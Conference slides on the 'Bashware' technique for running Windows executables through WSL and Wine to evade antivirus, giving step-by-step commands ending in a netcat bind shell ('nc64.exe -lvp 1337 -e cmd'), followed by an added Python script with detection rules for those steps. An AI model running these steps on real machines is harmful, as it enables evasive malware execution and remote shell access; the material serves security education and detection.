
Executing Windows Malware through WSL (Bashware)


1. Bashware: A malware execution technique

2. /usr/bin/who
   • null and OWASP Bangalore chapter leader
   • A decade of security experience in various technologies
   • Security researcher and evangelist
   • Speaker and trainer at several security conferences
   • https://ibreak.software
   • @riyazwalikar | @wincmdfu

3. What is Bashware?
   • A technique researched by Check Point Security that can be used by malware to run using the Windows Subsystem for Linux (WSL) without being detected by security solutions (AV etc.)
   • Basically a way to run PE executables using WSL
   • Bash + (mal)ware

4. Back to Basics
   • How does malware (pick any) infect a Windows machine?
   • How is it detected? Any examples of detection techniques?

5. An overview of WSL
   • WSL is a collection of components that enables native Linux ELF64 binaries to run on Windows. It contains both user mode and kernel mode components. It primarily consists of:
     • A user mode session manager service that handles the Linux instance life cycle
     • Pico provider drivers (lxss.sys, lxcore.sys) that emulate a Linux kernel by translating Linux syscalls
     • Pico processes that host the unmodified user mode Linux binaries (e.g. /bin/bash)

6. Demo of WSL

7. Bashware Video Demo
   • https://www.youtube.com/watch?v=fwEQFMbHIV8

8. Let's build a PoC!

9. According to the video/blog post
   • Enable WSL
   • Enable Developer mode
   • Install Linux components
   • Install WineHQ
   • Run Windows binary through Wine

10. Step 1: Enable WSL
    • DISM:
        dism /Online /Enable-Feature /All /FeatureName:Microsoft-Windows-Subsystem-Linux /NoRestart
    • PowerShell:
        Enable-WindowsOptionalFeature -O -F Microsoft-Windows-Subsystem-Linux

11. Step 2: Enable Developer mode
    • Set the following registry values:
        [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\AppModelUnlock]
        "AllowAllTrustedApps"=dword:1
        "AllowDevelopmentWithoutDevLicense"=dword:1

12. Step 3: Install Linux components
    • lxrun /install /y

13. Step 4: Install Wine
        dpkg --add-architecture i386
        add-apt-repository -y ppa:ubuntu-wine/ppa
        apt-get update
        apt-get install wine1.6-amd64

14. Step 5: Run PE binary using wine
        wine64 nc64.exe -lvp 1337 -e cmd

15. Demo

16. Riyaz Walikar
    • https://ibreak.software
    • @riyazwalikar | @wincmdfu

17. References
    • https://research.checkpoint.com/beware-bashware-new-method-malware-bypass-security-solutions/
    • https://www.youtube.com/watch?v=fwEQFMbHIV8
    • https://blogs.msdn.microsoft.com/wsl/2016/04/22/windows-subsystem-for-linux-overview/
    • https://ibreak.software/executing-windows-malware-in-windows-subsystem-for-linux-bashware/
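As an added example that is not part of the slides or of Check Point's research, the following Python script takes the defender's view of the five PoC steps above: it checks an exported AppModelUnlock key for the developer-mode values that step 2 sets, and runs simple detection rules over process-creation records for the DISM, lxrun and wine64 command lines from steps 1, 3 and 5. All inputs are constructed inline; the Sysmon-style field names (Image, CommandLine, ParentImage) and the sample paths are assumptions for illustration, and whether a particular sensor records WSL pico processes at all is likewise an assumption here, not a claim.

```python
"""Defender-side triage for the Bashware preconditions and execution pattern.
Added example, not code from the talk or from Check Point's research. Every input
is constructed inline: a .reg-style export of the AppModelUnlock key (the values
step 2 sets) and a few process-creation records using Sysmon Event ID 1 field
names. The Linux-side record is simply normalised to the same field names; whether
a given sensor actually observes WSL pico processes is an assumption, not a claim."""
import re

DEV_MODE_KEY = r"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\AppModelUnlock"
DEV_MODE_VALUES = ("AllowAllTrustedApps", "AllowDevelopmentWithoutDevLicense")

# Constructed .reg export mirroring step 2 (regedit exports DWORDs as 8 hex digits).
SAMPLE_REG_EXPORT = r"""Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\AppModelUnlock]
"AllowAllTrustedApps"=dword:00000001
"AllowDevelopmentWithoutDevLicense"=dword:00000001
"""

# Constructed process-creation records; paths and values are illustrative only.
SAMPLE_EVENTS = [
    {"Image": r"C:\Windows\System32\Dism.exe",
     "CommandLine": "dism /Online /Enable-Feature /All /FeatureName:Microsoft-Windows-Subsystem-Linux /NoRestart",
     "ParentImage": r"C:\Windows\System32\cmd.exe"},
    {"Image": r"C:\Windows\System32\lxrun.exe",
     "CommandLine": "lxrun /install /y",
     "ParentImage": r"C:\Windows\System32\cmd.exe"},
    {"Image": "/usr/bin/wine64",
     "CommandLine": "wine64 nc64.exe -lvp 1337 -e cmd",
     "ParentImage": "/bin/bash"},
    {"Image": r"C:\Windows\System32\notepad.exe",
     "CommandLine": "notepad.exe",
     "ParentImage": r"C:\Windows\explorer.exe"},
]


def developer_mode_unlocked(reg_text):
    """Names of AppModelUnlock values set to a non-zero DWORD (accepts dword:1 and dword:00000001)."""
    in_key, hits = False, []
    for raw in reg_text.splitlines():
        line = raw.strip()
        if line.startswith("["):                     # a new key section starts here
            in_key = line == "[" + DEV_MODE_KEY + "]"
            continue
        if not in_key:
            continue
        m = re.match(r'"([^"]+)"=dword:([0-9a-fA-F]+)$', line)
        if m and m.group(1) in DEV_MODE_VALUES and int(m.group(2), 16) != 0:
            hits.append(m.group(1))
    return hits


def classify(event):
    """Names of the Bashware-related rules one process record matches (may be empty)."""
    image = event.get("Image", "").lower()
    cmd = event.get("CommandLine", "").lower()
    rules = []
    # Step 1: the WSL optional feature being enabled from the command line.
    if "microsoft-windows-subsystem-linux" in cmd:
        rules.append("wsl_feature_enabled")
    # Step 3: legacy lxrun distro installation.
    if re.match(r"^(.*[\\/])?lxrun(\.exe)?\s+/install\b", cmd):
        rules.append("wsl_distro_install")
    # Step 5: Wine (inside WSL) handed a PE file to execute.
    if re.search(r"(^|/)wine(64)?$", image) and re.search(r"\.exe\b", cmd):
        rules.append("wine_executes_pe")
        # Raise severity when the PE's arguments name a Windows shell.
        if re.search(r"\b(cmd|powershell)(\.exe)?\b", cmd):
            rules.append("wine_pe_references_shell")
    return rules


def triage(events):
    """Map each matched rule to the command lines that triggered it."""
    findings = {}
    for ev in events:
        for rule in classify(ev):
            findings.setdefault(rule, []).append(ev.get("CommandLine", ""))
    return findings


if __name__ == "__main__":
    print("Developer mode values set:", developer_mode_unlocked(SAMPLE_REG_EXPORT))
    for rule, cmds in triage(SAMPLE_EVENTS).items():
        print("[" + rule + "] " + " | ".join(cmds))
```

Feeding a real `reg export` of the AppModelUnlock key and real process telemetry into these two functions gives a quick inventory of hosts where the preconditions from steps 1 to 3 are already in place, which is worth knowing even before any Wine activity appears; the rules are deliberately narrow string matches so that they can be tuned against a fleet's legitimate WSL and developer usage.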
